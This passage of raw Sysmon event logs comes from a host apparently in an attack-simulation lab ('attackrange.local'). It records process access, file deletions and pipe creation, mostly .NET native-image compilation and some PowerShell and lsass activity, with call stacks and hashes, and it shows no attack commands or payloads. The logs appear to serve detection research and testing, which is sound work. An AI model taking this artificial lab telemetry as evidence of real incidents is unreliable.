319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.183{4DB9351A-A275-60D3-4B05-00000000CF01}6180NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\O09S1ULPY9\Microsoft.InternationalSettings.Commands.ni.dll.auxMD5=8D48366602137FC249B959E9FA4AFA6D,SHA256=1458D79B1B96FC645B430BE9080A4AB8C41EC3554BC6F64CB5636ACF8EC4836C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.168{4DB9351A-A275-60D3-4B05-00000000CF01}6180NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\O09S1ULPY9\Microsoft.InternationalSettings.Commands.ni.dllMD5=F7D081239A3ECB0AE056448404FA0854,SHA256=743E92E4EEF033694E404B571E9B2FA8998E325FADD582A59DC8A1AF2DB4FF46,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.152{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-4B05-00000000CF01}6180C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.152{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-4B05-00000000CF01}6180C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.136{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-4B05-00000000CF01}6180C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.136{4DB9351A-A275-60D3-4A05-00000000CF01}7024NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\J6IEYOL0BU\Microsoft.Internal.Tasks.Dataflow.ni.dll.auxMD5=9F82F8FBB42C2B6BA82EEBC52D0FB42B,SHA256=DC475A82A39822C73BB405F99587EC07395B336D41961E5A09C845ED6C6E4CA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.136{4DB9351A-A275-60D3-4A05-00000000CF01}7024NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\J6IEYOL0BU\Microsoft.Internal.Tasks.Dataflow.ni.dllMD5=D5EEDBB2299A1F17FADF6E165B038806,SHA256=E231B80F2BED45320E83422AFF979D2812BA9D47459E33756531FEE9F62E3D83,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.136{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.136{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000022863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:07:01.058{4DB9351A-A273-60D3-3C05-00000000CF01}6608\PSHost.132689560193562012.6608.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x800000000000000022862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.043{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-4A05-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.043{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5ln4wdgy.koy.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.043{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0de0gyld.bbm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.027{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-4A05-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.027{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-4A05-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.027{4DB9351A-A274-60D3-4905-00000000CF01}4388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Z4X5G0FGGJ\Microsoft.GroupPolicy.Reporting.ni.dll.auxMD5=E2906093077E10B7F5698A77BABAB412,SHA256=6FA35088092D6086DFA8CFC1C40C806A5BA0A2B18319D0DF3876FF731B49C3CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.027{4DB9351A-A274-60D3-4905-00000000CF01}4388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Z4X5G0FGGJ\Microsoft.GroupPolicy.Reporting.ni.dllMD5=F7DD42B3085EE333E0319A10782E4198,SHA256=E707FDCB21C165F4FC8EBC104DBE142873849658E0C20F0126A06C89A32E2AE2,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.918{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5E05-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.886{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5E05-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.886{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5E05-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.886{4DB9351A-A276-60D3-5D05-00000000CF01}4776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EYPQ5ITGUO\Microsoft.PowerShell.Diagnostics.Activities.ni.dll.auxMD5=C603A34248BACD351EFAC0FD9406800A,SHA256=2759FD6C1969823E4F427B276224C7C99F4233F05A86A7B33BFBBACD541115A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.886{4DB9351A-A276-60D3-5D05-00000000CF01}4776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EYPQ5ITGUO\Microsoft.PowerShell.Diagnostics.Activities.ni.dllMD5=860D98D1B177DD5D7303047EDA1CAEC1,SHA256=214EC449F5558CF75634794C704DA13778999F38362A270E19C9CC829B8B6961,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.855{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5D05-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.839{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5D05-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.839{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5D05-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.839{4DB9351A-A276-60D3-5C05-00000000CF01}640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AQJKGD14M0\Microsoft.PowerShell.Core.Activities.ni.dll.auxMD5=0E5D1765DB037C944416873A705234D4,SHA256=2620409E027059F40914B62D77AE2E09DA920B65E6CEABC4DD0740F55F87D018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.839{4DB9351A-A276-60D3-5C05-00000000CF01}640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AQJKGD14M0\Microsoft.PowerShell.Core.Activities.ni.dllMD5=A56FED0137B08BD6535E35D3010FB872,SHA256=D3BE5290AC8148E1C748F8540052DEFC75F3697F97A347DEDC27896982531CFD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.746{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5C05-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.730{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5C05-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.730{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5C05-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.730{4DB9351A-A276-60D3-5B05-00000000CF01}6484NT 